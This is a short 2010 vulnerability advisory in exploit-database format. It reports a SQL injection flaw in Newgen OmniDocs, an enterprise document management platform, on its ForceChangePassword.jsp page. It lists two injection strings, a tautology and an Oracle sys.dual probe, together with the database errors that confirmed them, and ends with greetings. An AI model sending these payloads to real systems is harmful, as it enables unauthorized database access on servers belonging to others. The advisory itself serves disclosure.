-------------------------------------------------------------------- # Exploit Title: Omnidocs SQL injection Vulnerability # Date: 10 Feb 2010 # Author: thebluegenius # Software Link: http://www.newgensoft.com/omnidocs.asp # Version: All # Tested on: Apache-Coyote/1.1 | JBoss # CVE : NA --------------------------------------------------- "Omnidocs" SQL injection vulnerability. --------------------------------------------------- By :Thebluegenius. Email :rajsm@isac.org.in Blog :thebluegenius.com. --------------------------------------------------- Description: OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and contents. Also integrates seamlessly with other enterprise applications. ------------------ Vulnerability ------------------ Affected URL: http://IPaddressOrDomain/omnidocs/ForceChangePassword.jsp Command: ' or 'a' = 'a' Confirmed SQL Injection error : ORA-00907: missing right parenthesis Command: or exists (select 1 from sys.dual) and ''x''=''x' Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated ----------------------------------------------------- Greetz Fly Out to: 1] Amforked() : My good friend 2] Aodrulez : for inspiring me 3] www.OrchidSeven.com 4] www.isac.org.in